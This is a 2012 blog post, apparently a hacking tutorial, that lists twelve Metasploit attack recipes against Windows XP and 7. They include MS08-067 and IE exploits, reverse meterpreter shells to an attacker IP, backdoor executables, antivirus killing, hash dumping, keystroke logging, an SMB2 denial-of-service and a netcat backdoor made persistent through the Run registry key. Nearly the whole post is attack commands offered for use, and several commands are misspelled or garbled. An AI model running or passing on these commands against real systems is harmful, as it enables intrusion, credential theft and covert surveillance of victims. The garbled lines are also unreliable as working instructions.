Tuesday, October 9, 2012

Some Metasploit Attacks



today i will show you Some metasploit attacks.
Requirement:-
Backtrack.
Metasploit.

These are just some commands ,there are lots of options in metasploit. Acoording to vulnarability you can use it.

Attack 1: Hacking Windows XP with Metasploit tutorial - VNC remote control

use windows/smb/ms08_067_netapi
show optios
set RHOST 192.168.1.1 ----->IP target
set payload windows/vncinject/bind_tcp
exploit

Attack 2.Metasploit vs Windows 7 and AVG
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOT 192.168.0.1 ----->IP Attacker
set LPORT 5555
exploit
ps
migrate 1880
cd c:\ ls
download program-7.exe /root
run killav
shell

Attack 3. Hacking By Metasploit . Windows xp Sp3 
use windows/smb/ms08_067_netapi
set LHOST 192.168.1.1 --->ip attacker
set RHOST 192.168.1.1 ----->ip target
set payload windows/meterpreter/reverse_tcp
exploit

Attack 4: Hacking win7 with metasploit
nmap -sS -v -PN 192.168.1-255
use exploit/multi/handler
set LHOST 192.168.1.1 ------>ip attacker
set LPORT 5555
set payload windows/meterpreter/reverse_tcp
show optios
set EndOnSession false
show optios
set RHOST 192. ------>ip target
set RPORT 4321
show options
exploit

Attack 5: Exploit vulnerability in Windows 7
sudo nmap 192.168.1.1 ------>445/tcp_open microsoft-ds
use auxiliary/dos/windows/smb/smb2_negotiate_pidhigh
set RHOST 192.168.1.1 -----------ip target
set RPORT 445
run ----run the exploit

Attack 6: Metasploit backdooring
msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 X >backdoor.exe
root@kislay# cd /tmp
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.1 --->Listener's IP (Attacker)
show options
exploit
?
getuid
use priv
hashdump
keyscan_start
keyscan_dump
sysinfo
msg * ------->msg displayed on the screen

Attack 7: ms10 025 metasploit exploitation
nmap -O 192.168.1.7-----see the target operating system
search ms10
use exploit windows/mmsp/ms10_25_wmss_connect_funnel
set payload windows/shell_bind_tcp
show options
set RHOST 192.168.1.7 --ip target
exploit

Attack 8: IEPeers: ms10_08_ie_behaviors Exploit
search iepeers
use windows/browser/ms10_018_ie_behaviors
set PAYLOAD windows/exec
show options
set SRVHOST 192.168.1.1
set URIPATH /
set CMD calc.exe
set target 1
info ---->Available targets ;1 IE 6 spo-sp2 (onclick)
exploit
using url: http://192.168.1.1:8080/
open the browser mozilla or whatever browser used
type: http://192.168.1.1:8080/ ---enter
wait a few moments...

Attack 9: metasploit rpc_dum
nmap -sS 192.168...
135/TCP open
use msrpc_dcom_ms03_026
set payload win32_reverse_meterpreter
show options
set RHOST 192.168.1.1 ---->ip target
set LHOST 192.168.0.1 ----->ip attacker
exploit
help
use -m process
execute -f cmd.exe -c
interact 1
c:\winnt\system32\>dir

Attack 10: Uploading A Backdoor Metasploit Netcat
meterpreter> upload netcat.exe c:\\WINDOWS\\SYSTEM32\\
meterpreter> reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CureentVersion\\Run
meterpreter> reg setval -k HKLM\\software\\Microsoft\\Windows\\CureentVersion\\Run -v windows live -d "c:\\WINDOWS\\SYSTEM32\\netcat.exe -L -d -p 5555 -e cmd.exe
meterpreter> reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CureentVersion\\Run
meterpreter> reboot
bt~# nc 192.168.1.1 5555

Attack 11: BackTrack 4 R1 Metasploit 3 & SET, Hacking Windows 7
cd /pentest/exploits/SET
./set
Enter you choice: 4
enter the ip addres : 192.168.1.1
enter chose ( hit enter for default): 2
enter chose ( hit enter for default):16
set port 4444
open Konqueror /pentest/exploits/SET/
media/sda3 ---------->msf.exe
cd /pentest/exploits/SET# cd ..

/pentest/exploits# cd framework3
./msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168..
set lport 4444
exploit
use priv
help
excecute -f cmd
ipconfig
shell
screenhot
excecute -f explorer

Attack 12:ms067 + netcat backdoor
use windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set RHOST
set LHOST
exploit
upload /root/nc.exe c:\\WINDOWS\\SYSTEM32\\

3 comments:

Basant said...

Can you tell what each of these attack do?

Animesh said...

Suckx

Unknown said...

Can you tell what each of these attack do? can you tell us small discription

Post a Comment

UA-35960349-1